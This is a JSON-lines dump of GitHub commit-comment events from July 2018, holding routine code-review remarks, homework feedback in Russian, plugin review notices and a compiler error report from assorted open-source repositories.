{"id":"8034144327","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29874790,"position":18,"line":49,"path":"ruby_basics_part_1/right-angled_triangle.rb","commit_id":"7cb5a302e962ebbe06582143bb3ebbda47e5efaf","created_at":"2018-07-29T15:15:58Z","updated_at":"2018-07-29T15:15:58Z","author_association":"NONE","body":"про эту проверку я тебе писал на первой сдаче:\r\n\r\n> обрати внимание на \"Также\" - равнобедренность нужно проверять ТОЛЬКО, ЕСЛИ он прямоугольный, а у тебя она проверяется в любом случае - это нарушение ТЗ, надо исправлять\r\n\r\nи в предыдущем варианте ты так и проверял: `is_right_angeled && is_isosceles` - это верно\r\nневерно было дургое, на что Влад и постарался обратить твое внимание: у тебя проверки \"прямоугольный\" (47 строка старого варианта) и \"прямоугольный и равнобедренный\" (50 строка старого варианта) шли в двух независимых \"иф - блоках\", а т.к. эти блоки были не связаны, то выполнялись оба, вот Влад тебе пишет:\r\n\r\n> Сейчас если треугольник у нас проямоугольный и равнобедренный у нас выведется\r\n> ```\r\n> This triangle is right angled\r\n> This triangle is isosceles triangle\r\n>```\r\n> А нам бы хотелось видеть только одно из этих 2 сообщений. \r\n\r\nдалее он тебе объясняет, что нужно использовать один блок и в нем \"ифэлсы\"\r\nи ты в этом смысле все верно сделал - написал один блок, вместо нескольких независимых и в нем \"ифэлсы\"\r\nно проверка в 49 строке должна быть как была раньше и на прямоугольность и на равнобедренность: `is_right_angeled && is_isosceles`"}},"created_at":"2018-07-29T15:15:58Z"}
{"id":"8034145488","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"MiniGameAPI-PM/MiniGameAPI"},"payload":{"comment":{"id":29874795,"position":null,"line":null,"path":null,"commit_id":"56aa4a6973a69ca79a0d3363c72c5424d0d3b605","created_at":"2018-07-29T15:16:46Z","updated_at":"2018-07-29T15:16:46Z","author_association":"NONE","body":"> Dear @MiniGameAPI-PM:\n> Regarding the release you submitted, named \"**MiniGameAPI**\" (v1.0.1), for the project [MiniGameAPI](https://poggit.pmmp.io/ci/MiniGameAPI-PM/MiniGameAPI/MiniGameAPI) on 2018-07-29T06:54:19.000Z, there are some problems with the values in the submit form.\n\nI appreciate that this plugin could become useful, but this API plugin lacks documentation. For API plugins, we strictly require good documentation since they are supposed to be used with other plugins. I know there is an example plugin, which would be useful, but I would like to see the following in your documentation, either through Poggit's plugin description or through your GitHub repo's wiki linked from the plugin description:\n1. Documentation on how to create a game plugin would be better. Your plugin contains quite a lot of source code, so it is not easy to understand how your whole plugin works. Unless you expect every developer to start off by cloning MGARace, a minimal and elaborated template would be great.\n2. The semantics of MiniGameAPI is unclear. How does it manage players? How does the game flow work? Can a player be in multiple games or multiple teams simultaneously? How are ops (or other privileged players who can potentially break the expected semantics of the system by teleporting around) handled? What exactly is a game or a team? To provide a good API, you should define these concepts clearly.\n3. It is suggested that you explain why MiniGameAPI should be used, e.g. how it empowers integration of different games, etc. Also, is it possible to have games hosted on multiple servers instead of just one? How well will it work? What if each server only runs one game?\n\n> Your release has been reset to draft. Please [edit the release](https://poggit.pmmp.io/edit/MiniGameAPI-PM/MiniGameAPI/MiniGameAPI/140) to resolve these problems, then click \"Submit\" on the edit page to have the plugin reviewed again.\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-29T15:16:46Z"}
{"id":"8034145729","type":"CommitCommentEvent","actor":{"login":"1Bennell"},"repo":{"name":"blockchain/My-Wallet-V3"},"payload":{"comment":{"id":29874796,"position":1,"line":308,"path":"src/api.js","commit_id":"5ace69a383630da2fd65382d9cae640e20196426","created_at":"2018-07-29T15:16:57Z","updated_at":"2018-07-29T15:16:57Z","author_association":"NONE","body":"Fetch"}},"created_at":"2018-07-29T15:16:57Z"}
{"id":"8034146617","type":"CommitCommentEvent","actor":{"login":"1Bennell"},"repo":{"name":"blockchain/My-Wallet-V3"},"payload":{"comment":{"id":29874797,"position":1,"line":308,"path":"src/api.js","commit_id":"5ace69a383630da2fd65382d9cae640e20196426","created_at":"2018-07-29T15:17:34Z","updated_at":"2018-07-29T15:17:34Z","author_association":"NONE","body":"bch\r\n"}},"created_at":"2018-07-29T15:17:34Z"}
{"id":"8034146932","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29874799,"position":null,"line":null,"path":null,"commit_id":"9df44fbe95ca85270c12c8e88258804ffbfa20f7","created_at":"2018-07-29T15:17:46Z","updated_at":"2018-07-29T15:17:46Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-441](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-441).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-441-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-29T15:17:46Z"}
{"id":"8034146975","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29874800,"position":null,"line":null,"path":null,"commit_id":"d7a105bd0db5f06130040363e15ad5ba456cb8b0","created_at":"2018-07-29T15:17:47Z","updated_at":"2018-07-29T15:17:47Z","author_association":"OWNER","body":"We should make label-free data definitions an error. And fix tiny to give labels."}},"created_at":"2018-07-29T15:17:47Z"}
{"id":"8034148215","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29874802,"position":null,"line":null,"path":null,"commit_id":"a64ff3b1a21faee7d5e96f2257caaffc7fb4c9ae","created_at":"2018-07-29T15:18:38Z","updated_at":"2018-07-29T15:18:38Z","author_association":"MEMBER","body":"I also wasn't too happy to search/scroll through 7k lines everytime I want to change something."}},"created_at":"2018-07-29T15:18:38Z"}
{"id":"8034148413","type":"CommitCommentEvent","actor":{"login":"1Bennell"},"repo":{"name":"blockchain/My-Wallet-V3"},"payload":{"comment":{"id":29874803,"position":29,"line":41,"path":"tests/api.spec.js","commit_id":"5ace69a383630da2fd65382d9cae640e20196426","created_at":"2018-07-29T15:18:45Z","updated_at":"2018-07-29T15:18:45Z","author_association":"NONE","body":"Block chain mywallet"}},"created_at":"2018-07-29T15:18:45Z"}
{"id":"8034152388","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29874813,"position":17,"line":48,"path":"ruby_basics_part_1/right-angled_triangle.rb","commit_id":"7cb5a302e962ebbe06582143bb3ebbda47e5efaf","created_at":"2018-07-29T15:21:29Z","updated_at":"2018-07-29T15:21:29Z","author_association":"NONE","body":"если уж ты не стал выносить эту проверку в отдельный блок, как рекомендовал Влад, а присоединил к общему \"иф-элсиф-элс\" блоку, то \"экзит\" не нужен\r\nв блоке в любом случае выполнится только одна ветвь\r\nдва варианта дальнейших правок:\r\n- либо все же вынести это в отдельный блок с \"экзитом\" (аналогично блоку в строках 37-40) и поставить этот блок перед 42 строкой (а 43 строку вынести перед ним)\r\n- либо оставить этот код здесь, но тогда убрать \"экзит\", т.к. он не имеет смысла\r\n\r\nпервый вариант предпочтительней, потому что не придется считать строки 42 и 44, которые не имеют смысла для равностороннего треугольника"}},"created_at":"2018-07-29T15:21:29Z"}
{"id":"8034153066","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29874814,"position":null,"line":null,"path":null,"commit_id":"42783a280ba9057d774cdb1459627b5ab109397d","created_at":"2018-07-29T15:21:56Z","updated_at":"2018-07-29T15:21:56Z","author_association":"OWNER","body":"We already have `Int` to represent integers. Why do we also need `Integ`?\r\n\r\nThe change to printing of `Dbl` here is also note quite \"right\". If the 'base' of a double is between -3 and 3, it should be displayed 'as is', not in scientific notation."}},"created_at":"2018-07-29T15:21:56Z"}
{"id":"8034166442","type":"CommitCommentEvent","actor":{"login":"Kush5900"},"repo":{"name":"Kush5900/oproject"},"payload":{"comment":{"id":29874862,"position":null,"line":null,"path":null,"commit_id":"b923f184ac5c834de95d3e6c4b59f20dd1a67a2e","created_at":"2018-07-29T15:30:33Z","updated_at":"2018-07-29T15:30:33Z","author_association":"OWNER","body":"@mucyomiller yo man WTF is going on? .env  is still there! what i did is pull origin master and commit but the stuff is still there and the .gitignore file seem OK. am confused."}},"created_at":"2018-07-29T15:30:33Z"}
{"id":"8034169507","type":"CommitCommentEvent","actor":{"login":"lenchen1112"},"repo":{"name":"LeetcodeGo/leetcode_jing"},"payload":{"comment":{"id":29874875,"position":21,"line":21,"path":"algorithms/28_Implement_strStr.c","commit_id":"8191f2345d55cccc935984835e7214ab17481e5b","created_at":"2018-07-29T15:32:33Z","updated_at":"2018-07-29T15:32:33Z","author_association":"NONE","body":"If you don't want to implement KMP, you can use rolling hash as alternative but it needs to watch out overflow issue."}},"created_at":"2018-07-29T15:32:33Z"}
{"id":"8034171423","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29874885,"position":17,"line":615,"path":"code/stable/nopcm/SRS/NoPCM_SRS.tex","commit_id":"d91f5fc728433489661ced5438be5fa0b58629d2","created_at":"2018-07-29T15:33:54Z","updated_at":"2018-07-29T15:33:54Z","author_association":"OWNER","body":"Minor thing, but: why is the content of the item on a new line lined up with the \\label? The old formatting of this was 'better' (even if it is inside a .tex file that most should not read)."}},"created_at":"2018-07-29T15:33:54Z"}
{"id":"8034172479","type":"CommitCommentEvent","actor":{"login":"gabrieldov"},"repo":{"name":"rootzoll/raspiblitz"},"payload":{"comment":{"id":29874886,"position":null,"line":null,"path":null,"commit_id":"7507b9115bd01c2749d97b8f2767fb17ee0daae3","created_at":"2018-07-29T15:34:36Z","updated_at":"2018-07-29T15:34:36Z","author_association":"NONE","body":"still left \"#educatiuonal-tutorials\""}},"created_at":"2018-07-29T15:34:36Z"}
{"id":"8034173240","type":"CommitCommentEvent","actor":{"login":"buitruong"},"repo":{"name":"buitruong/toy_app"},"payload":{"comment":{"id":29874889,"position":8,"line":8,"path":"Gemfile","commit_id":"d8a7f480e65518a12064ce2813d61092f90d5f1a","created_at":"2018-07-29T15:35:06Z","updated_at":"2018-07-29T15:35:06Z","author_association":"OWNER","body":"xoa dong nay di"}},"created_at":"2018-07-29T15:35:06Z"}
{"id":"8034174839","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29874895,"position":null,"line":null,"path":null,"commit_id":"66348f03304177db25cefe081874505483bd0f87","created_at":"2018-07-29T15:36:08Z","updated_at":"2018-07-29T15:36:08Z","author_association":"OWNER","body":"When you expose a new API from a package, you should bump up the version number."}},"created_at":"2018-07-29T15:36:08Z"}
{"id":"8034175781","type":"CommitCommentEvent","actor":{"login":"bladeoner"},"repo":{"name":"emukidid/snes9xgx"},"payload":{"comment":{"id":29874902,"position":null,"line":null,"path":null,"commit_id":"a4177458176bfdf2881aebf3204c0a4fb5083640","created_at":"2018-07-29T15:36:46Z","updated_at":"2018-07-29T15:36:46Z","author_association":"NONE","body":"Hi @emukidid after this commit on the Master branch I cannot compile the source anymore.\r\nI'm getting the following error with both the latest as r26 of de devkitPro toolkit, any idea which could cause this?\r\n\r\nmake -f Makefile.wii\r\nmake[1]: Map '/c/devkitpro/examples/snes9xgx-master' wordt binnengegaan\r\nsnes9xgx.cpp\r\nC:/devkitpro/examples/snes9xgx-master/source/snes9xgx.cpp: In function 'int main(int, char**)':\r\nC:/devkitpro/examples/snes9xgx-master/source/snes9xgx.cpp:405:23: error: invalid conversion from 'void ()()' to 'resetcallback' {aka 'void ()(long unsigned int, void*)'} [-fpermissive]\r\nSYS_SetResetCallback(ResetCB);\r\n^~~~~~~\r\nIn file included from C:/devkitPro/libogc/include/gccore.h:62,\r\nfrom C:/devkitpro/examples/snes9xgx-master/source/snes9xgx.cpp:14:\r\nC:/devkitPro/libogc/include/ogc/system.h:325:50: note: initializing argument 1 of 'void (* SYS_SetResetCallback(resetcallback))(u32, void*)'\r\nresetcallback SYS_SetResetCallback(resetcallback cb);\r\n^\r\nC:/devkitpro/examples/snes9xgx-master/source/snes9xgx.cpp:493:20: warning: format '%x' expects argument of type 'unsigned int*', but argument 3 has type 'u32*' {aka 'long unsigned int*'} [-Wformat=]\r\nsscanf(argv[4], \"%08x\", &GCSettings.Exit_Channel[0]);\r\n^~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nC:/devkitpro/examples/snes9xgx-master/source/snes9xgx.cpp:494:20: warning: format '%x' expects argument of type 'unsigned int*', but argument 3 has type 'u32*' {aka 'long unsigned int*'} [-Wformat=]\r\nsscanf(argv[5], \"%08x\", &GCSettings.Exit_Channel[1]);\r\n^~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nmake[2]: *** [/opt/devkitpro/devkitPPC/base_rules:13: snes9xgx.o] Fout 1\r\nmake[1]: *** [Makefile.wii:109: build_wii] Fout 2\r\nmake[1]: Map '/c/devkitpro/examples/snes9xgx-master' wordt verlaten\r\nmake: *** [Makefile:10: wii] Error 2"}},"created_at":"2018-07-29T15:36:46Z"}
{"id":"8034176892","type":"CommitCommentEvent","actor":{"login":"mehmetyasararas"},"repo":{"name":"pulkit24/ToME"},"payload":{"comment":{"id":29874906,"position":null,"line":null,"path":null,"commit_id":"98bceec599100a04bb6091bad18c96177caee9ce","created_at":"2018-07-29T15:37:33Z","updated_at":"2018-07-29T15:37:33Z","author_association":"NONE","body":"Hello Thanks For mod.\r\nI installed it.\r\nWhen ı open Create Scenario or new game the game gives a error message like this;\r\n\"İnvalid tech tree marker(expected NTT, version 1):ran, version 32\"\r\n\r\n![tome](https://user-images.githubusercontent.com/41870471/43367948-e38c5bc2-935d-11e8-86e9-ec1787afdd6a.JPG)\r\n"}},"created_at":"2018-07-29T15:37:33Z"}
{"id":"8034177899","type":"CommitCommentEvent","actor":{"login":"prachud"},"repo":{"name":"prachud/mean-train"},"payload":{"comment":{"id":29874912,"position":null,"line":null,"path":null,"commit_id":"5e2fee5467801cefa0f0491d57fb7452e53ff013","created_at":"2018-07-29T15:38:15Z","updated_at":"2018-07-29T15:38:15Z","author_association":"OWNER","body":"tet"}},"created_at":"2018-07-29T15:38:15Z"}
{"id":"8034178393","type":"CommitCommentEvent","actor":{"login":"prachud"},"repo":{"name":"prachud/mean-train"},"payload":{"comment":{"id":29874915,"position":null,"line":null,"path":null,"commit_id":"5e2fee5467801cefa0f0491d57fb7452e53ff013","created_at":"2018-07-29T15:38:36Z","updated_at":"2018-07-29T15:38:36Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-29T15:38:36Z"}
{"id":"8034178677","type":"CommitCommentEvent","actor":{"login":"apapirovski"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29874921,"position":13,"line":757,"path":"lib/fs.js","commit_id":"57b432c0549dbfe845747dcfe3ac485305de7779","created_at":"2018-07-29T15:38:46Z","updated_at":"2018-07-29T15:38:46Z","author_association":"MEMBER","body":"(This will be exhaustive feedback, including nits.)\r\n\r\nI can guarantee that someone (probably me 😆) will want this refactored so that it's not a scoped arrow function since it impedes performance and you don't need access to this scope."}},"created_at":"2018-07-29T15:38:46Z"}
{"id":"8034178900","type":"CommitCommentEvent","actor":{"login":"bladeoner"},"repo":{"name":"emukidid/snes9xgx"},"payload":{"comment":{"id":29874922,"position":null,"line":null,"path":null,"commit_id":"a4177458176bfdf2881aebf3204c0a4fb5083640","created_at":"2018-07-29T15:38:55Z","updated_at":"2018-07-29T15:38:55Z","author_association":"NONE","body":"Attached are the devkitPro tools I use, I also tried downloading the newer PPC files but it gives me the same error.\r\n\r\nThanks in advance.\r\n\r\n"}},"created_at":"2018-07-29T15:38:55Z"}
{"id":"8034181248","type":"CommitCommentEvent","actor":{"login":"apapirovski"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29874928,"position":11,"line":756,"path":"lib/fs.js","commit_id":"57b432c0549dbfe845747dcfe3ac485305de7779","created_at":"2018-07-29T15:40:32Z","updated_at":"2018-07-29T15:40:32Z","author_association":"MEMBER","body":"You should tell the request whether it should return types or not. That way your code below can be a bit cleaner, right?"}},"created_at":"2018-07-29T15:40:32Z"}
{"id":"8034181692","type":"CommitCommentEvent","actor":{"login":"bladeoner"},"repo":{"name":"emukidid/snes9xgx"},"payload":{"comment":{"id":29874930,"position":null,"line":null,"path":null,"commit_id":"a4177458176bfdf2881aebf3204c0a4fb5083640","created_at":"2018-07-29T15:40:54Z","updated_at":"2018-07-29T15:40:54Z","author_association":"NONE","body":"[devkitPro.zip](https://github.com/emukidid/snes9xgx/files/2238907/devkitPro.zip)\r\n"}},"created_at":"2018-07-29T15:40:54Z"}
{"id":"8034181738","type":"CommitCommentEvent","actor":{"login":"TheOneric"},"repo":{"name":"TheOneric/ExPIIIb"},"payload":{"comment":{"id":29874931,"position":null,"line":null,"path":null,"commit_id":"62fbc2f6cc138471e0c5ef0dd68d9ed5510930d0","created_at":"2018-07-29T15:40:56Z","updated_at":"2018-07-29T15:40:56Z","author_association":"OWNER","body":"\\sectionRef isst dazu gedacht, dass man mit dem optionalen Argument, auf das Kapitel im Demtröder verweisen kann, welches dieses Thema behandelt. (Falls so ein Kapitel exisitiert)\r\nAlso z.B.: `\\sectionRef{Harmonischer Oszillator}[4.2.5]`\r\nEs wäre gut wenn du das noch rgänzen könntest. Falls man in der Klausur noch mehr INfos braucht als in dieser Zusammenfassung auftauchen, oder Beispiele sehen will, kann man diese schnell im Demtröder finden."}},"created_at":"2018-07-29T15:40:56Z"}
{"id":"8034181960","type":"CommitCommentEvent","actor":{"login":"LituanamBochon"},"repo":{"name":"LituanamBochon/Data-structure-assignment--BY---Litu-anam-Bochon---1702013"},"payload":{"comment":{"id":29874932,"position":null,"line":null,"path":null,"commit_id":"76556cd4b32601c24f7f605890ea969f96d43700","created_at":"2018-07-29T15:41:05Z","updated_at":"2018-07-29T15:41:05Z","author_association":"OWNER","body":"n"}},"created_at":"2018-07-29T15:41:05Z"}
{"id":"8034181998","type":"CommitCommentEvent","actor":{"login":"annacruz"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29874933,"position":11,"line":11,"path":"src/decode.h","commit_id":"3a56d07d5dda81fa5d46e842bfcee6aa94182d4d","created_at":"2018-07-29T15:41:06Z","updated_at":"2018-07-29T15:41:06Z","author_association":"CONTRIBUTOR","body":"Reading well what the functions do, they don't parse the messages, they decode it. So we thought it was better to rename it."}},"created_at":"2018-07-29T15:41:06Z"}
{"id":"8034182155","type":"CommitCommentEvent","actor":{"login":"apapirovski"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29874935,"position":33,"line":777,"path":"lib/fs.js","commit_id":"57b432c0549dbfe845747dcfe3ac485305de7779","created_at":"2018-07-29T15:41:11Z","updated_at":"2018-07-29T15:41:11Z","author_association":"MEMBER","body":"You should tell the request whether it should return types or not. That way your code below can be a bit cleaner, right? (You could either do it by setting a property to `req` or by adding an option to `readdir` (which would, I guess, be breaking.)"}},"created_at":"2018-07-29T15:41:11Z"}
{"id":"8034182977","type":"CommitCommentEvent","actor":{"login":"apapirovski"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29874942,"position":18,"line":762,"path":"lib/fs.js","commit_id":"57b432c0549dbfe845747dcfe3ac485305de7779","created_at":"2018-07-29T15:41:45Z","updated_at":"2018-07-29T15:41:45Z","author_association":"MEMBER","body":"You can avoid this here by just assigning two diff callbacks to `oncomplete` depending on the `options.types`."}},"created_at":"2018-07-29T15:41:45Z"}
{"id":"8034183401","type":"CommitCommentEvent","actor":{"login":"disias"},"repo":{"name":"udacity/reactnd-UdaciFitness-complete"},"payload":{"comment":{"id":29874944,"position":9,"line":8,"path":"App.js","commit_id":"9ff26370e4e5593195fdcad4d85e74f540a39220","created_at":"2018-07-29T15:42:03Z","updated_at":"2018-07-29T15:42:03Z","author_association":"NONE","body":" I use this way :"}},"created_at":"2018-07-29T15:42:03Z"}
{"id":"8034184200","type":"CommitCommentEvent","actor":{"login":"smarter"},"repo":{"name":"lampepfl/dotty"},"payload":{"comment":{"id":29874946,"position":6,"line":29,"path":"compiler/src/dotty/tools/dotc/core/tasty/TastyPickler.scala","commit_id":"5ab850bc9f4b93edfaa27a47f6a6aa917705c366","created_at":"2018-07-29T15:42:34Z","updated_at":"2018-07-29T15:42:34Z","author_association":"MEMBER","body":"Iterators are confusing, what about doing `val treeSection :: otherSections = sections; ...` ?"}},"created_at":"2018-07-29T15:42:34Z"}
{"id":"8034184876","type":"CommitCommentEvent","actor":{"login":"annacruz"},"repo":{"name":"otrv4/libotr-ng-toolkit"},"payload":{"comment":{"id":29874949,"position":4,"line":22,"path":"src/helper.c","commit_id":"60da873465b73f5e8f2a15aa41349aedd7668ac1","created_at":"2018-07-29T15:42:59Z","updated_at":"2018-07-29T15:42:59Z","author_association":"CONTRIBUTOR","body":"In the otrv4 protocol description all the times that ECDH was written, it was in uppercase, we followed that pattern. But we can change it if this is a problem"}},"created_at":"2018-07-29T15:42:59Z"}
{"id":"8034185302","type":"CommitCommentEvent","actor":{"login":"apapirovski"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29874950,"position":23,"line":767,"path":"lib/fs.js","commit_id":"57b432c0549dbfe845747dcfe3ac485305de7779","created_at":"2018-07-29T15:43:15Z","updated_at":"2018-07-29T15:43:15Z","author_association":"MEMBER","body":"I think this is slightly faster with `i+=2` and not having to use `lastString`. Also, you can `const newResult = new Array(result.length / 2);`"}},"created_at":"2018-07-29T15:43:15Z"}
{"id":"8034187296","type":"CommitCommentEvent","actor":{"login":"apapirovski"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29874962,"position":19,"line":1281,"path":"src/node_file.cc","commit_id":"57b432c0549dbfe845747dcfe3ac485305de7779","created_at":"2018-07-29T15:44:31Z","updated_at":"2018-07-29T15:44:31Z","author_association":"MEMBER","body":"I'm sure someone will complain about an unrelated space insertion. 😆 "}},"created_at":"2018-07-29T15:44:31Z"}
{"id":"8034187920","type":"CommitCommentEvent","actor":{"login":"fengxinyao1"},"repo":{"name":"Jays-boat/NeteaseCloudMusic"},"payload":{"comment":{"id":29874966,"position":null,"line":null,"path":null,"commit_id":"5d434d444f4b33805b0030a4f761291372828a3f","created_at":"2018-07-29T15:44:55Z","updated_at":"2018-07-29T15:44:55Z","author_association":"NONE","body":"good job！"}},"created_at":"2018-07-29T15:44:55Z"}
{"id":"8034189324","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"SpecterTeam/Pinger"},"payload":{"comment":{"id":29874970,"position":null,"line":null,"path":null,"commit_id":"e474884bcd55c5bcb037a88e4f1773cd75812982","created_at":"2018-07-29T15:45:50Z","updated_at":"2018-07-29T15:45:50Z","author_association":"NONE","body":"> Dear @SpecterTeam:\n> I regret to inform you that the release you submitted, named \"**Pinger**\" (v1.0), for the project [Pinger](https://poggit.pmmp.io/ci/SpecterTeam/Pinger/Pinger) on 2018-07-23T01:03:57.000Z, has been rejected.\n\nhttps://forums.pmmp.io/threads/clean-up-our-consoles.5656/\n\n> Please resolve the issues listed above and submit the updated plugin again.\n> Note: This comment is created here because this is the last commit when the released build was created.\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-29T15:45:50Z"}
{"id":"8034189817","type":"CommitCommentEvent","actor":{"login":"draganstojanov"},"repo":{"name":"draganstojanov/AndroidTraining"},"payload":{"comment":{"id":29874971,"position":18,"line":18,"path":"README.md","commit_id":"7c083b786dbc71110ccf0db6781971977f2b44b0","created_at":"2018-07-29T15:46:12Z","updated_at":"2018-07-29T15:46:12Z","author_association":"OWNER","body":"### Minuti\r\nCalculating outgoing call length and tell the user how much minutes still remain from the cell - operator plan."}},"created_at":"2018-07-29T15:46:12Z"}
{"id":"8034190892","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29874975,"position":11,"line":11,"path":"2/day_of_year.rb","commit_id":"c11f7c37f3e9417c2e5b9cfbcc23dfa078d69981","created_at":"2018-07-29T15:46:58Z","updated_at":"2018-07-29T15:46:58Z","author_association":"NONE","body":"Можно передать day первым аргументом в редьюс. Он будет начальным значением."}},"created_at":"2018-07-29T15:46:58Z"}
{"id":"8034191288","type":"CommitCommentEvent","actor":{"login":"BKPepe"},"repo":{"name":"BKPepe/MyBB_CZE-translation-1.8.x"},"payload":{"comment":{"id":29874978,"position":null,"line":null,"path":null,"commit_id":"8b7feb3aaa58a682a2e9c6e94bc71c196067d15f","created_at":"2018-07-29T15:47:15Z","updated_at":"2018-07-29T15:47:15Z","author_association":"OWNER","body":"a ještě https://github.com/mybb/mybb/commit/aba530b7fa740208db760d9fa649a05dc51568fc"}},"created_at":"2018-07-29T15:47:15Z"}
{"id":"8034192118","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29874983,"position":40,"line":23,"path":"Lesson_2/day_serial_number.rb","commit_id":"3c6258b5a54d1285ee29359f4ab2c475243f1ed7","created_at":"2018-07-29T15:47:46Z","updated_at":"2018-07-29T15:47:46Z","author_association":"NONE","body":"не самое \"чистое\" решение\r\nхотя и работающее ))\r\nправильно то, что ты не перебираешь все месяцы\r\nне очень правильно, что ты используешь `break` \r\nздесь лучше воспользоваться методом `first` класса `Array`, [доки](https://ruby-doc.org/core-2.5.0/Array.html#method-i-first)\r\nи с его помощью выбрать из массива только нужный тебе подмассив\r\nвот так:\r\n```ruby\r\narray_month.first(month - 1)\r\n```\r\nдальше без всяких `break` пробегаешь по всему подмассиву и все суммируешь\r\nлибо еще \r\n\r\n(еще в классе `Array` есть метод [`take(n)`](https://ruby-doc.org/core-2.5.1/Array.html#method-i-take), который тоже возвращает первые `n` элементов массива)"}},"created_at":"2018-07-29T15:47:46Z"}
{"id":"8034192192","type":"CommitCommentEvent","actor":{"login":"lordmauve"},"repo":{"name":"py-zero/cryptozero"},"payload":{"comment":{"id":29874984,"position":21,"line":44,"path":"README.md","commit_id":"59a016d84be487003447703d9d06e640d64382b0","created_at":"2018-07-29T15:47:49Z","updated_at":"2018-07-29T15:47:49Z","author_association":"NONE","body":"I think this is a kind of \"cuteness\" that can be a bit offputting to beginners."}},"created_at":"2018-07-29T15:47:49Z"}
{"id":"8034192795","type":"CommitCommentEvent","actor":{"login":"glebmachine"},"repo":{"name":"phonegap/phonegap-plugin-push"},"payload":{"comment":{"id":29874985,"position":null,"line":null,"path":null,"commit_id":"1ecff81a9eac51b56403948d0092e3ab55a72234","created_at":"2018-07-29T15:48:14Z","updated_at":"2018-07-29T15:48:14Z","author_association":"NONE","body":"Could you please also open this ticket: https://github.com/phonegap/phonegap-plugin-push/issues/2141\r\nThis ticket is still actual, but nobody unable to continue the conversation\r\n\r\nCould you please check this error? It reproduced with blank project"}},"created_at":"2018-07-29T15:48:14Z"}
{"id":"8034193956","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29874992,"position":11,"line":11,"path":"2/day_of_year.rb","commit_id":"c11f7c37f3e9417c2e5b9cfbcc23dfa078d69981","created_at":"2018-07-29T15:49:01Z","updated_at":"2018-07-29T15:49:01Z","author_association":"NONE","body":"Сейчас код запускается. Но не уверен, что его проверяли\r\n```\r\n:2$ ruby day_of_year.rb\r\nдень: 5\r\nмесяц: 2\r\nгод: 2000\r\n28\r\n```"}},"created_at":"2018-07-29T15:49:01Z"}
{"id":"8034195357","type":"CommitCommentEvent","actor":{"login":"apapirovski"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29874994,"position":41,"line":788,"path":"lib/fs.js","commit_id":"57b432c0549dbfe845747dcfe3ac485305de7779","created_at":"2018-07-29T15:50:00Z","updated_at":"2018-07-29T15:50:00Z","author_association":"MEMBER","body":"If we follow some of the feedback from above then we'll be able to just return `result` here and then below we could use the same function as we would use in the callback above, so that we don't have to rewrite the same code twice."}},"created_at":"2018-07-29T15:50:00Z"}
{"id":"8034195682","type":"CommitCommentEvent","actor":{"login":"forchain"},"repo":{"name":"DAGfans/DAG_paper"},"payload":{"comment":{"id":29874996,"position":null,"line":null,"path":null,"commit_id":"50932d770a13b71c23ebc0d1036ec0320b9c87d2","created_at":"2018-07-29T15:50:12Z","updated_at":"2018-07-29T15:50:12Z","author_association":"CONTRIBUTOR","body":"“Unfortunately, the Maximum k -cluster SubDAG problem is NP hard (see problem [GT26] in [2]), and PHANTOM is therefore of less practical use for an ever-growing blockDAG. We thus introduce a greedy algorithm that is more suitable for implementation. We call this greedy variant GHOSTDAG. 4”"}},"created_at":"2018-07-29T15:50:12Z"}
{"id":"8034196994","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29874997,"position":18,"line":18,"path":"2/day_of_year.rb","commit_id":"c11f7c37f3e9417c2e5b9cfbcc23dfa078d69981","created_at":"2018-07-29T15:51:05Z","updated_at":"2018-07-29T15:51:05Z","author_association":"NONE","body":"Повторюсь еще раз\r\n\r\nVladFiliucov 9 hours ago\r\nПовторюсь: Настрой редактор на отступ ровно в 2 пробела, именно так принято в ruby. Причем, именно пробела, а не таба. Т.е. должна быть замена табов на пробелы, т.н. soft tabs. Найди в интернете как сделать soft tabs для твоего редактора"}},"created_at":"2018-07-29T15:51:05Z"}
